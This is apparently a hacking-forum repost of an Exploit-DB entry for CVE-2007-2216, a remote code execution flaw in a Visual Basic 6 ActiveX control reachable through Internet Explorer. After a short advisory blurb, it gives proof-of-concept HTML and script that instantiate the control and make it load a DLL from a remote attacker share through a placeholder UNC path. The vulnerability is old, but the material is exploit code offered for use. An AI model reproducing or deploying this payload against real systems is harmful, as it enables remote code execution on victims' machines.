Exploit Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30490
Проверка EDB
  1. Пройдено
Автор
BRETT MOORE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-2216
Дата публикации
2007-05-08
Код:
source: https://www.securityfocus.com/bid/25289/info

The Microsoft Visual Basic 6 TypeLib Information Library (TLI) ActiveX control is prone to a remote code-execution vulnerability.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. 

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
 
Источник
www.exploit-db.com

Похожие темы